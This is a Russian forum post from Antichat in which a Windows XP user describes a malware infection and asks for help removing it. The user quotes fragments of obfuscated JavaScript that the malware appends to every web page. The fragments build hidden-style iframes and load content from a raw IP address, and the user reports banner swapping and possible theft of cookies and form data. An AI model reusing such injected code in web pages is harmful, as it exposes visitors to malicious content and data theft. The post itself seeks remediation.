Форум АНТИЧАТ - Подцепил вирус. нужно лечение.

стоит WinXP. Недавно подцепил какую-то херню. Вирус проявляется в том, что
1)все соединения запрошенные через броузеры отправляются от имени эксплорера. если эксплореру не давать права отправлять запросы-то броузер попросту не открывает страницы.
2)к каждой странице добавляется яваскрипт-код весьма большого веса. Причем после конца документа. содержание примерно такое:

Код:

</body>

</html>

<script type="text/javascript" language="javascript">



    var   AVidFwCHAppNSQXBd=  657 - 30606;

    jYwJhMaYgnUJDUaWHkK = window.onload;

    var oDCQtBcAmfBrLVe =6051 + 9815;

        window.onload = vQtxWTsaEYvWmWG;

        IuGdoqVmjGlcsEPFmVl = 19119;

        

    QgVxFTkTaUKEoKOQ = "";

    var   pcBrqcvdVKCNJBqod=  8777 - 1125;

    xfdNKBQaIwxewaDji = "";

    var EoLCbbpddxQpDnmE =31400;

    AxkgATsgBjXTMbgP = "";



...

...

...



var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};LxwmQqbwQvgXoXOcMF.push(element);

jkrByjMmjyMUFJjm.push(CreateyoVcLstievvEmDpject_24578457887(

'b720x300',

'http://85.12.43.83/fls.geo/HK_720x300_1.html?a=b',

'720', '720', '300', '300',

'',

''));



...

...

...



function rgpnQIURcMJqLABW(yoVcLstievvEmDpj)

        {

        var   dwkIsJxiemdLOHsvD;

                var QwmhGWqlhFNcDDGREQ = document.createElement("IFRAME");

                uQNeqLfJMQjKDvIHc =14043 + 23606;

                QwmhGWqlhFNcDDGREQ.id = yoVcLstievvEmDpj.FrID;

                

                QwmhGWqlhFNcDDGREQ.name = yoVcLstievvEmDpj.FrName; 

                var   VJCWjHMbmWSGgSQrS=  9804 - 3054;

                QwmhGWqlhFNcDDGREQ.framespacing = yoVcLstievvEmDpj.FrSpacing; 

                AoGBPeUgtvOYDlyH =30686 + 26984;

                QwmhGWqlhFNcDDGREQ.frameborder = yoVcLstievvEmDpj.FrBorder; 

                var PmHnbBFMohbAVNtS =12018 + 6157;

                QwmhGWqlhFNcDDGREQ.scrolling = yoVcLstievvEmDpj.FrScrolling ; 

                var JoUkNgWNPNIgjdMwQ =11385 + 14775;

                QwmhGWqlhFNcDDGREQ.width = yoVcLstievvEmDpj.FrWidthMin; 

                var   CdVSHkhAKhMKAQfat;

                QwmhGWqlhFNcDDGREQ.height = yoVcLstievvEmDpj.FrHeightMin;                

                xrtWnsHoNvYDRyrv = 26284;

                QwmhGWqlhFNcDDGREQ.marginWidth = "0";

                gNALKqVNlcgxptLww = 12459;

                QwmhGWqlhFNcDDGREQ.marginHeight = "0";

                

                if(!QwmhGWqlhFNcDDGREQ.frameborder || QwmhGWqlhFNcDDGREQ.frameborder == 'no')

                {

                var oQoHUoKwdVCnsuxuW =15045 + 22871;

                    QwmhGWqlhFNcDDGREQ.style.borderWidth = "0px";

                    var   edPbIDDhuKTTYdxRGW;

                    QwmhGWqlhFNcDDGREQ.frameBorder = '0';

                    var   qiSeLugrjBiiQFlw;

                }                        



...

...

...

3)Заметил, что эта суко на некоторых сайтах меняет баннеры на свои. возможн пересылает куда-то данные форм и куки...
4)в автозагрузке появились лишние длл"ки. Удаляю, при загрузке винды они появляются снова.

Фаерволл оутпост и антивирь нод32 с полными обновлениями молчат.
Нужна помощь.